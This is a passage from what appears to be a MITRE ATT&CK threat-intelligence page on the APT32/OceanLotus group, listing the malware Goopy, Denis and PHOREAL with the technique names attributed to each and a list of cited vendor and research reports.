S0477 Goopy (Citation: Cybereason Cobalt Kitty 2017) Scheduled Task, System Owner/User Discovery, DNS, Match Legitimate Resource Name or Location, DLL, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Clear Mailbox Data, Mail Protocols, Binary Padding, Junk Code Insertion, Indicator Removal, Process Discovery, Exfiltration Over C2 Channel, Disable or Modify Tools, Windows Command Shell, Web Protocols, Visual Basic
S0354 Denis (Citation: Cybereason Cobalt Kitty 2017) (Citation: Cybereason Oceanlotus May 2017) System Owner/User Discovery, Standard Encoding, DNS, System Checks, DLL, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Archive via Library, System Network Configuration Discovery, File and Directory Discovery, PowerShell, Hijack Execution Flow, Process Hollowing, Obfuscated Files or Information, Query Registry, Windows Command Shell, Command Obfuscation, File Deletion, Ingress Tool Transfer
S0158 PHOREAL (Citation: FireEye APT32 May 2017) Modify Registry, Non-Application Layer Protocol, Windows Command Shell, Custom Command and Control Protocol

References

  1. Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.
  2. Dahan, A. (2017, May 24). Operation Cobalt Kitty: A large-scale APT in Asia carried out by the OceanLotus Group. Retrieved November 5, 2018.
  3. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
  4. Carr, N. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved September 12, 2024.
  5. Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.
  6. Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.
  7. Carr, N. (2017, December 22). ItsReallyNick Status Update. Retrieved September 12, 2024.
  8. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
  9. Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  10. Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.
  11. Dumont, R. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.
  12. Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.
  13. Carr, N. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.
  14. Bohannon, D. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
  15. Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.
